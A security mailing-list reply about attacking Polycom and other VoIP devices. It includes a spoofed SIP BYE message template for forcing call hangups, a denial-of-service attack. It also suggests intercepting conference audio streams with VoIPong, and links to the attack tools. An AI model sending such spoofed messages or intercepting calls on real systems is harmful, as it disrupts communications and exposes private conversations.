Paul Schmehl wrote:
Is anyone aware of any work done in the field of hacking Polycom video-conferencing devices? Or any known hacks for Polycom devices?
Hey Paul, I have a modified version of Asteroid lying on one of my servers that affected Polycoms, Snoms, Hitachi WiFi's, and possibly a few others. Offhand you could with high probability generate a hangup DoS if you know enough about the network topology. E.g.: BYE sip:victim.phone.com SIP/2.0 Via: SIP/2.0/TCP spoofed.pbx.server.com:5060 Max-Forwards: 70 From: Spoofed <sip:spoofed.pbx.server.com> To: VICTIM <sip:victim@xxxxxxxxxxxxxxxx> Call-ID: $GENERATE_CID_NUMBER@xxxxxxxxxxxxxxxx CSeq: 1 BYE Content-Length: 0 You could take a look at Asteroid and target a Polycom with it. I haven't bothered much with them. Cisco's aren't vuln to much I've thrown at them yet. (greetings Dario@^C*). As for video (H323) check out voippong: You may be able to intercept the audio streams out of the conference depending on the setup. (Asterisk doesn't do H323)... Maybe a combination of Yates, VoIPPong and others. HTH http://www.enderunix.org/voipong/ http://www.infiltrated.net/asteroid/ http://www.voipsa.org/Resources/tools.php -- ==================================================== J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743echo infiltrated.net|sed 's/^/sil@/g'
"Wise men talk because they have something to say; fools, because they have to say something." -- Plato
Attachment:
smime.p7s
Description: S/MIME Cryptographic Signature
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/